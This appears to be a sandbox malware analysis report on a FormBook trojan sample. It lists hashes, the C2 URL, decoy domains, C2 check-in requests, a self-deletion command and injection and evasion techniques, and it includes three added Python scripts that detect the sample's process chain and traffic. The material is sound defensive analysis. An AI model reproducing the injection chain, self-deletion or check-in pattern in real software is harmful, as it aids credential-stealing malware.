
Windows Analysis Report Fu94e0b1TR

Overview

General Information

Sample Name: Fu94e0b1TR (renamed file extension from none to exe)
Analysis ID: 502374
MD5: 6429aa83e4bc083b4f0b3f44b0d7950f
SHA1: 0ead59881f054284f611accb61451ed1ffc818fc
SHA256: 96c57ae661562e958e01bb0b490c09a0a51bb367931620223174963de88bdfcb
Tags: 32, exe, trojan

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Fu94e0b1TR.exe (PID: 4628 cmdline: 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 4840 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 2848 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 3204 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 1844 cmdline: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
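
The tree above is the whole FormBook chain: the .NET loader (PID 4628) starts copies of itself (4840, 2848) to hollow, the copy at 2848 injects the unpacked payload into explorer.exe (3472, drawn beneath it for that reason), explorer.exe launches NETSTAT.EXE (3204) as the final host, and that copy removes the original file through cmd.exe (1844). The report notes further down that no Sigma rule matched, so the script below shows what a tree-aware detection would key on. It is an added example, not part of the Joe Sandbox report: the process-creation records are constructed from the tree above (the image path of cmd.exe is assumed to be the SysWOW64 copy, since the report gives only its command line), and the rule names are this example's own.

```python
"""Tree-aware triage of the process-creation chain in the report.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from
the report's process tree (PIDs, images and command lines as listed there); the
image path of cmd.exe is an assumption, as the report shows only its command
line. The field names mimic a Sysmon Event ID 1 / EDR process-creation record.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]   # None when no parent was recorded
    image: str
    cmdline: str


# Constructed from the report's process tree.
EVENTS: List[ProcEvent] = [
    ProcEvent(4628, None, r"C:\Users\user\Desktop\Fu94e0b1TR.exe",
              r"'C:\Users\user\Desktop\Fu94e0b1TR.exe'"),
    ProcEvent(4840, 4628, r"C:\Users\user\Desktop\Fu94e0b1TR.exe",
              r"C:\Users\user\Desktop\Fu94e0b1TR.exe"),
    ProcEvent(2848, 4628, r"C:\Users\user\Desktop\Fu94e0b1TR.exe",
              r"C:\Users\user\Desktop\Fu94e0b1TR.exe"),
    ProcEvent(3472, 2848, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(3204, 3472, r"C:\Windows\SysWOW64\NETSTAT.EXE",
              r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    ProcEvent(1844, 3204, r"C:\Windows\SysWOW64\cmd.exe",   # image path assumed
              r"/c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'"),
    ProcEvent(4308, 1844, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# `del` target in a cmd.exe command line: double-quoted, single-quoted (how the
# sandbox renders quotes) or bare.
_DEL_RE = re.compile(r"""\bdel\b\s+(?:"([^"]+)"|'([^']+)'|(\S+))""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def del_target(cmdline: str) -> Optional[str]:
    """Return the path a `del` command would remove, or None."""
    m = _DEL_RE.search(cmdline)
    if not m:
        return None
    return next(g for g in m.groups() if g)


def ancestors(by_pid: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Parent chain of `pid`, nearest first; stops on a missing parent or a cycle."""
    chain: List[ProcEvent] = []
    seen = {pid}
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid is not None and cur.ppid not in seen:
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        seen.add(parent.pid)
        chain.append(parent)
        cur = parent
    return chain


def triage(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) findings for the three links in the chain."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[str, int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid) if e.ppid is not None else None
        pb = basename(parent.image) if parent else ""
        cb = basename(e.image)
        # 1. The injected explorer.exe starts a system utility to host the next stage.
        if pb == "explorer.exe" and cb == "netstat.exe":
            findings.append(("explorer_spawns_netstat", e.pid, e.image))
        # 2. A networking utility has no legitimate reason to launch cmd.exe.
        if pb == "netstat.exe" and cb == "cmd.exe":
            findings.append(("netstat_spawns_cmd", e.pid, e.cmdline))
        # 3. cmd /c del <path> where <path> is the image of a process further up
        #    the tree: the payload erasing the file it was launched from.
        target = del_target(e.cmdline) if cb == "cmd.exe" else None
        if target:
            for anc in ancestors(by_pid, e.pid):
                if anc.image.lower() == target.lower():
                    findings.append(("self_delete_via_cmd", e.pid,
                                     f"deletes image of pid {anc.pid}: {target}"))
                    break
    return findings


if __name__ == "__main__":
    for rule, pid, detail in triage(EVENTS):
        print(f"{rule:24} pid={pid} {detail}")
```

Run against EVENTS this yields three findings: explorer.exe launching NETSTAT.EXE, NETSTAT.EXE launching cmd.exe, and the `del` whose target is the image of PID 2848 four levels up the tree. The third rule is the one worth keeping generic: matching the deleted path against every ancestor's image, rather than just the parent's, is what catches self-deletion that has been pushed through an intermediate host process.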

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings follow each row)
00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(24 entries in total; the remaining rows are not reproduced here)

        Unpacked PEs

Source | Rule | Description | Author (matched strings follow each row)
6.2.Fu94e0b1TR.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.Fu94e0b1TR.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.Fu94e0b1TR.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x15ca9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dbc:$sqlite3step: 68 34 1C 7B E1
          • 0x15cd8:$sqlite3text: 68 38 2A 90 C5
          • 0x15dfd:$sqlite3text: 68 38 2A 90 C5
          • 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
6.2.Fu94e0b1TR.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.Fu94e0b1TR.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(8 entries in total; the remaining rows are not reproduced here)
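
The Formbook_1 and JPCERT strings hit at different offsets in the 0x400000 memory dump and in `.raw.unpack` (0x8608, 0x146a5, 0x16aa9, ...) than in `.unpack` (0x7808, 0x138a5, 0x15ca9, ...), and every pair differs by exactly 0xE00. The memory dump and `.raw.unpack` keep the image's virtual layout, so offsets relative to the 0x400000 base are RVAs, while `.unpack` is rebuilt on file alignment, so its offsets are raw file offsets. The script below is an added example, not part of the report: it copies both hit lists from the tables above, checks that the delta is uniform, and shows how an RVA maps to a raw offset through a section table. The section table is hypothetical, chosen so that the first section's raw/virtual gap is 0xE00, because the report prints none. Side note: `68 xx xx xx xx` is x86 `push imm32`, so the JPCERT strings are presumably the hashed sqlite3 API names (step/text/blob) the payload pushes when resolving imports.

```python
"""Relating YARA hit offsets between the memory dump and the rebuilt PE.

Added example, not part of the Joe Sandbox report. MEMORY_HITS and UNPACK_HITS
are copied from the report's Yara Overview; SECTIONS is a hypothetical section
table (the report prints none) chosen so that the first section's raw/virtual
gap reproduces the observed delta.
"""
from typing import Dict, List, NamedTuple, Set

# Offsets in 00000006.00000002.370028583.0000000000400000...sdmp (identical to
# 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack), relative to the 0x400000 base.
MEMORY_HITS: Dict[str, List[int]] = {
    "$sequence_0": [0x8608, 0x8992], "$sequence_1": [0x146a5],
    "$sequence_2": [0x14191], "$sequence_3": [0x147a7], "$sequence_4": [0x1491f],
    "$sequence_5": [0x93aa], "$sequence_6": [0x1340c], "$sequence_7": [0xa122],
    "$sequence_8": [0x19b77], "$sequence_9": [0x1ac1a],
    "$sqlite3step": [0x16aa9, 0x16bbc], "$sqlite3text": [0x16ad8, 0x16bfd],
    "$sqlite3blob": [0x16aeb, 0x16c13],
}
# The same strings in 6.2.Fu94e0b1TR.exe.400000.0.unpack (file-aligned rebuild).
UNPACK_HITS: Dict[str, List[int]] = {
    "$sequence_0": [0x7808, 0x7b92], "$sequence_1": [0x138a5],
    "$sequence_2": [0x13391], "$sequence_3": [0x139a7], "$sequence_4": [0x13b1f],
    "$sequence_5": [0x85aa], "$sequence_6": [0x1260c], "$sequence_7": [0x9322],
    "$sequence_8": [0x18d77], "$sequence_9": [0x19e1a],
    "$sqlite3step": [0x15ca9, 0x15dbc], "$sqlite3text": [0x15cd8, 0x15dfd],
    "$sqlite3blob": [0x15ceb, 0x15e13],
}


class Section(NamedTuple):
    name: str
    virtual_address: int   # RVA of the section
    virtual_size: int
    raw_offset: int        # PointerToRawData
    raw_size: int          # SizeOfRawData


# Hypothetical (assumption of this example): one code section mapped at RVA
# 0x1000 whose raw data starts at file offset 0x200, i.e. a 0xE00 gap.
SECTIONS: List[Section] = [
    Section(".text", 0x1000, 0x1B000, 0x200, 0x1B000),
    Section(".rsrc", 0x1C000, 0x1000, 0x1B200, 0x1000),
]


def offset_deltas(mem: Dict[str, List[int]], unp: Dict[str, List[int]]) -> Set[int]:
    """Set of (memory offset - unpack offset) over every paired hit."""
    deltas: Set[int] = set()
    for name, m_offs in mem.items():
        u_offs = unp.get(name, [])
        if len(u_offs) != len(m_offs):
            raise ValueError(f"{name}: {len(m_offs)} memory hits vs {len(u_offs)} unpack hits")
        deltas.update(m - u for m, u in zip(sorted(m_offs), sorted(u_offs)))
    return deltas


def rva_to_raw(rva: int, sections: List[Section]) -> int:
    """Translate an RVA to a file offset via the section table."""
    for s in sections:
        span = max(s.virtual_size, s.raw_size)
        if s.virtual_address <= rva < s.virtual_address + span:
            return rva - s.virtual_address + s.raw_offset
    raise ValueError(f"RVA {rva:#x} not inside any section")


def raw_to_rva(off: int, sections: List[Section]) -> int:
    """Translate a file offset back to an RVA via the section table."""
    for s in sections:
        if s.raw_offset <= off < s.raw_offset + s.raw_size:
            return off - s.raw_offset + s.virtual_address
    raise ValueError(f"file offset {off:#x} not inside any section")


def mapping_consistent(mem: Dict[str, List[int]], unp: Dict[str, List[int]],
                       sections: List[Section]) -> bool:
    """True if every memory hit, mapped through the table, lands on its unpack hit."""
    for name, m_offs in mem.items():
        mapped = sorted(rva_to_raw(o, sections) for o in m_offs)
        if mapped != sorted(unp[name]):
            return False
    return True


if __name__ == "__main__":
    print("deltas:", {hex(d) for d in offset_deltas(MEMORY_HITS, UNPACK_HITS)})
    print("consistent with hypothetical table:", mapping_consistent(MEMORY_HITS, UNPACK_HITS, SECTIONS))
```

The practical use is the reverse direction: when a YARA hit is reported against an unpacked file and you want to set a breakpoint or inspect the bytes in a live dump, add the section gap (`raw_to_rva`) and the image base (0x400000 here; 0x3C0000 for the copy injected into NETSTAT.EXE, per the memory dumps listed above) rather than assuming the file offset equals the address.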

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            AV Detection:

Found malware configuration
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as reproduced in the Malware Configuration section above)
Yara detected FormBook
Source: Yara match, File source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Fu94e0b1TR.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Fu94e0b1TR.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL, source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb, source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: Fu94e0b1TR.exe, NETSTAT.EXE
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe, Code function: 4x nop then pop ebx, 6_2_00406ABB
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe, Code function: 4x nop then pop edi, 6_2_0040C37C
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe, Code function: 4x nop then pop edi, 6_2_0040C3E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx, 18_2_003C6ABB
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 18_2_003CC37C
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 18_2_003CC3E9

            Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.instatechnovelz.com
Source: C:\Windows\explorer.exe, Network Connect: 172.65.227.72 80
Source: C:\Windows\explorer.exe, Domain query: www.apricitee.com
Source: C:\Windows\explorer.exe, Domain query: www.shacksolid.com
Source: C:\Windows\explorer.exe, Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe, Domain query: www.brondairy.com
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.fis.photos/ef6c/
Source: Joe Sandbox View, ASN Name: NBS11696US NBS11696US
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic, HTTP traffic detected: GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1, Host: www.apricitee.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (non-printable)
Source: global traffic, HTTP traffic detected: GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1, Host: www.shacksolid.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (non-printable)
Source: Joe Sandbox View, IP Address: 64.190.62.111 64.190.62.111
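
Both check-ins above go to domains from the configuration's decoy list (apricitee.com, shacksolid.com) rather than to the listed C2 host, use the configured path /ef6c/, carry no User-Agent, send Connection: close, and put seven null bytes in the body of a GET; the three ET "FormBook CnC Checkin (GET)" Snort signatures fire on these requests. The function below is an added example, not part of the report: it scores HTTP requests against the extracted configuration plus those traits. The sample requests are reconstructed from the two GETs in the report (plus one constructed benign control), the C2 entry and the decoy subset come from the Malware Configuration section, and the weights and threshold are this example's own choices.

```python
"""Scoring HTTP requests against the FormBook configuration in the report.

Added example, not part of the Joe Sandbox report. C2_LIST and DECOYS are taken
from the extracted configuration (DECOYS is a subset); SAMPLE_REQUESTS are
reconstructed from the two GETs in the report plus one constructed benign
control; the weights and the threshold are assumptions of this example.
"""
import re
from typing import Dict, List, Set, Tuple

C2_LIST: List[str] = ["www.fis.photos/ef6c/"]
DECOYS: Set[str] = {"apricitee.com", "shacksolid.com", "instatechnovelz.com", "brondairy.com"}

SAMPLE_REQUESTS: List[str] = [
    "GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1\r\n"
    "Host: www.apricitee.com\r\nConnection: close\r\n\r\n",
    "GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1\r\n"
    "Host: www.shacksolid.com\r\nConnection: close\r\n\r\n",
    # constructed benign control
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

_B64ISH = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, query params and headers."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    # Split by hand: urllib.parse.parse_qsl would turn '+' into a space and
    # mangle the base64-looking blob.
    params: List[Tuple[str, str]] = []
    for part in (query.split("&") if query else []):
        k, _, v = part.partition("=")
        params.append((k, v))
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return {"method": method, "path": path, "params": params, "headers": headers}


def norm_host(host: str) -> str:
    host = host.lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def c2_paths(c2_list: List[str]) -> Set[str]:
    """'/ef6c/' from 'www.fis.photos/ef6c/'."""
    return {"/" + e.split("/", 1)[1] for e in c2_list if "/" in e}


def c2_hosts(c2_list: List[str]) -> Set[str]:
    return {norm_host(e.split("/", 1)[0]) for e in c2_list}


def is_b64ish(s: str, min_len: int = 40) -> bool:
    return len(s) >= min_len and _B64ISH.fullmatch(s) is not None


def score_request(req: dict, c2_list: List[str] = C2_LIST,
                  decoys: Set[str] = DECOYS) -> Tuple[int, List[str]]:
    """Weighted traits of a FormBook check-in; weights are this example's own."""
    score, reasons = 0, []
    headers = req["headers"]
    host = norm_host(headers.get("host", ""))
    if req["path"] in c2_paths(c2_list):
        score += 2
        reasons.append("path matches configured C2 path")
    if host in c2_hosts(c2_list) or host in decoys:
        score += 2
        reasons.append("host is a configured C2/decoy domain")
    if "user-agent" not in headers:
        score += 1
        reasons.append("no User-Agent")
    if headers.get("connection", "").lower() == "close":
        score += 1
        reasons.append("Connection: close")
    if any(is_b64ish(v) for _, v in req["params"]):
        score += 1
        reasons.append("long base64-looking query value")
    return score, reasons


def detect(raw_requests: List[str], threshold: int = 4) -> List[dict]:
    hits = []
    for raw in raw_requests:
        req = parse_request(raw)
        score, reasons = score_request(req)
        if score >= threshold:
            hits.append({"host": req["headers"].get("host"), "path": req["path"],
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_REQUESTS):
        print(h["host"], h["path"], h["score"], "; ".join(h["reasons"]))
```

Two things the report's traffic makes obvious and the scorer reflects: the configured C2 host (fis.photos) never appears on the wire, so a block list built only from the "C2 list" entry misses every check-in, while the decoy list plus the path does not; and the path/host signals alone are enough to cross the threshold, so the User-Agent and Connection traits mainly serve to keep the score up when the configuration is not yet known.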
(The font-vendor URLs below are font name-table metadata, designer and licence links, present in the .NET loader's memory (process 0); they are not network indicators for this sample.)
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: Fu94e0b1TR.exe, 00000000.00000003.252645289.00000000059A1000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp, String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Fu94e0b1TR.exe, 00000000.00000002.285145562.0000000005964000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: Fu94e0b1TR.exe, 00000000.00000003.257245826.000000000599C000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/%
